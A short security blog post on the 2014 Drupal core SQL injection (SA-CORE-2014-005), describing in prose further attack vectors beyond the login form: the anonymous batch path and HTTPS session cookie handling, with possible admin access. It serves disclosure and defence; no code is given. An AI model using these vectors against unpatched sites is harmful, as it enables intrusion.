Other vectors for SA-CORE-2014-005?
Heine Fri, 2014/10/31 - 21:57
This is intended a comment on Acquia's Learning from hackers a week after the Drupal SQL Injection announcement, but mollom prevents me from posting it there. In it, scor asks:
An open question is whether the SQL injection vulnerability was exploitable via some vector other than via the user login form.
Absolutely! Paths accessible to anonymous users that take user data to a query are all vulnerable. POSTs to the login form are not necessary. Examples:
System batch processing
The path to the batch system is accessible to anonymous users, because the page does access checks after doing a SQL query. This SQL query accepts an id from the request. Either GET or POST works. Depending on your PHP configuration, even COOKIE can be used.
If one prefers, and is able to upload files to the site, a slightly modified query is able to cause this file to be executed. Alternatively, one could try to piggyback on the unserialize and execute a destructor.
Session handling code (COOKIE)
The default session handling code stores information in the database. It has to query on session values to obtain stored session information.
If the site uses HTTPS, a value from $_COOKIE is used in such a query. This value can be used to conduct a SQL injection attack. An exploit could result in uid 1 access to the site, possibly _without_ even having to insert a session into the db.
I haven't seen these, nor use of other potential avenues in the wild, but then again, I can only observe a small number of sites.